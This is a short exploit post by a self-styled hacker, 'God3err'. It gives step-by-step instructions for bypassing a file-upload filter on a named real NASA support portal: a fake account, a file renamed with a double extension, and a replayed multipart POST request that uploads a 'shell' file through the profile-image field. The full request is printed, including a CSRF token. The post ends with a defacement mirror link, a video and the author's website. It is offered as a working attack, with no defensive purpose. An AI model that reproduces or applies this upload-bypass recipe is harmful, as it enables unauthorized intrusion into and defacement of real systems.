NASA Submit Upload Exploit Founder : God3err 1) Open site https://support.earthdata.nasa.gov/ 2) Create fake account 3) Install Live HTTP Headers and HTTP Requester 4) Open Live HTTP Header and rename index.html.jpg 5) Upload this file 6) Copy POST Request 7) Paste HTTP Requester and POST :)) POST https://support.earthdata.nasa.gov/index.php?/Base/UserAccount/ProfileSubmit -----------------------------25505821327763\r\n Content-Disposition: form-data; name="salutation"\r\n \r\n 0\r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="fullname"\r\n \r\n asfsafa safsafs\r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="userorganization"\r\n \r\n \r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="userdesignation"\r\n \r\n \r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="phone"\r\n \r\n \r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="profileimage"; filename="shell.txt.jpg(EDIT)"\r\n Content-Type: image/jpeg\r\n \r\n Exploited By God3err\r\n NASA Shell Explo!t\r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="sendemailtoall"\r\n \r\n 1\r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="emaillist[]"\r\n \r\n ******@*****.com(EDIT)\r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="_csrfhash"\r\n \r\n xca9fo1wjcsd4o3zwdtzlo5x3j3lio7v\r\n -----------------------------25505821327763--\r\n Success E.g http://overflowzone.com/mirror/84863/ Video : https://youtu.be/2pL0_bEXhNc Website : god3err.pw